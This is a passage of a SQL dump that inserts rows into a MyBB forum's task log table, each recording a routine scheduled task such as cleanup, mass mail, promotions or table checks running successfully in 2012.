`tid`, `dateline`, `data`) VALUES ('14119', '3', '1351773471', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14118', '9', '1351773468', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14117', '5', '1351773450', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14116', '5', '1351772005', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14115', '7', '1351771997', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14114', '1', '1351771989', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14113', '3', '1351771924', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14112', '9', '1351771913', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14111', '5', '1351770832', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14110', '9', '1351770222', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14109', '3', '1351769458', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14108', '7', '1351769136', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14107', '1', '1351769129', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14106', '3', '1351769119', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14105', '9', '1351769111', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14104', '5', '1351769102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14103', '5', '1351761753', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14102', '7', '1351761637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14101', '1', '1351761610', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14100', '3', '1351761602', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14099', '9', '1351761597', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14098', '5', '1351759517', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14097', '9', '1351759286', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14096', '3', '1351758809', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14095', '9', '1351758803', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14094', '5', '1351758323', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14093', '5', '1351757712', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14092', '7', '1351757688', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14091', '1', '1351757649', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14090', '3', '1351757628', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14089', '9', '1351757619', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14088', '5', '1351756332', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14087', '9', '1351756327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14086', '3', '1351755151', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14085', '9', '1351754728', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14084', '5', '1351754712', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14083', '9', '1351754346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14082', '5', '1351753588', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14081', '7', '1351753583', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14080', '1', '1351753580', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14079', '3', '1351753571', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14078', '9', '1351752969', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14077', '5', '1351752304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14076', '9', '1351752126', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14075', '3', '1351751566', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14074', '9', '1351751251', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14073', '5', '1351751105', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14072', '9', '1351750222', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14071', '5', '1351749908', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14070', '7', '1351749628', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14069', '1', '1351749624', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14068', '3', '1351749544', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14067', '9', '1351749387', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14066', '5', '1351748941', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14065', '9', '1351748938', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14064', '3', '1351748352', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14063', '9', '1351747538', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14062', '5', '1351747529', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14061', '7', '1351747462', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14060', '1', '1351747450', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14059', '3', '1351747058', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14058', '9', '1351746534', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14057', '5', '1351746063', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14056', '9', '1351744824', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14055', '3', '1351744221', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14054', '9', '1351743918', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14053', '5', '1351743910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14052', '9', '1351743107', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14051', '5', '1351742875', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14050', '8', '1351742826', 'The log cleanup task successfully ran and pruned any old logs.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9144', '5', '1349844759', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9143', '3', '1349844752', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9142', '9', '1349844749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9141', '5', '1349843553', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9140', '9', '1349842287', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9139', '5', '1349841946', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9138', '11', '1349841744', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9137', '7', '1349841724', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9136', '2', '1349841695', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9135', '1', '1349841655', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9134', '3', '1349841634', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9133', '3', '1349841393', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9132', '9', '1349841379', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9131', '5', '1349840926', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9130', '9', '1349839136', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9129', '7', '1349838762', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9128', '5', '1349838762', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9127', '1', '1349838708', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9126', '3', '1349837972', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9125', '9', '1349837716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9124', '5', '1349837188', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9123', '9', '1349836924', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9122', '3', '1349836314', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9121', '9', '1349836062', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9120', '5', '1349835988', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9119', '9', '1349835010', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9118', '5', '1349834927', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9117', '7', '1349834408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9116', '1', '1349834405', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9115', '3', '1349834366', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9114', '9', '1349834362', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9113', '5', '1349833528', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9112', '9', '1349833444', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9111', '3', '1349832783', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9110', '9', '1349832385', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9109', '5', '1349832376', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9108', '9', '1349831415', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9107', '5', '1349831103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9106', '7', '1349830866', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9105', '1', '1349830858', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9104', '3', '1349830742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9103', '9', '1349830550', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9102', '5', '1349829904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9101', '9', '1349829648', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9100', '3', '1349829012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9099', '9', '1349828820', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9098', '5', '1349828727', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9097', '9', '1349827872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9096', '5', '1349827504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9095', '7', '1349827370', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9094', '1', '1349827333', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9093', '3', '1349827174', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9092', '9', '1349826947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9091', '5', '1349826384', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9090', '9', '1349826076', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9089', '3', '1349825438', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9088', '9', '1349825117', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9087', '5', '1349825110', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9086', '9', '1349824211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9085', '5', '1349823903', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9084', '7', '1349823605', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9083', '1', '1349823602', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9082', '3', '1349823548', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9081', '9', '1349823305', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9080', '5', '1349822707', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9079', '9', '1349822517', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9078', '3', '1349822071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9077', '9', '1349821872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9076', '5', '1349821836', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9075', '9', '1349820669', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9074', '5', '1349820415', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9073', '7', '1349820397', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9072', '1', '1349820396', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9071', '3', '1349820392', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9070', '9', '1349819892', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9069', '5', '1349819546', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9068', '9', '1349818814', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9067', '3', '1349818470', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9066', '5', '1349817919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9065', '9', '1349817914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9064', '5', '1349816757', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9063', '7', '1349816584', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9062', '1', '1349816583', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9061', '3', '1349816581', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9060', '9', '1349816581', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9059', '5', '1349815658', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9058', '9', '1349815654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9057', '3', '1349814742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9056', '9', '1349814406', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9055', '5', '1349814326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9054', '9', '1349813472', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9053', '5', '1349813110', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9052', '7', '1349812841', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9051', '1', '1349812806', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9050', '3', '1349812742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9049', '9', '1349812519', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9048', '5', '1349811910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9047', '9', '1349811615', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9046', '3', '1349811006', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9045', '9', '1349810733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9044', '5', '1349810727', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9043', '9', '1349809858', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9042', '5', '1349809531', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9041', '7', '1349809232', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9040', '1', '1349809229', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9039', '3', '1349809141', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9038', '9', '1349808925', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9037', '5', '1349808649', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9036', '9', '1349808647', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9035', '3', '1349807645', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9034', '5', '1349807636', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9033', '9', '1349807630', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9032', '7', '1349807203', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9031', '1', '1349807176', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9030', '3', '1349806699', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9029', '5', '1349805985', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9028', '9', '1349805370', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9027', '3', '1349803827', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9026', '9', '1349803809', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9025', '5', '1349803684', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9024', '7', '1349803387', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9023', '1', '1349803078', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9022', '3', '1349803064', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9021', '9', '1349802600', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9020', '5', '1349802592', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9019', '9', '1349800866', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9018', '3', '1349800633', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9017', '9', '1349800627', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9016', '5', '1349800189', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9015', '5', '1349799645', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9014', '7', '1349799600', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9013', '4', '1349799595', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9012', '1', '1349799528', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9011', '3', '1349799527', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9010', '9', '1349799511', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES 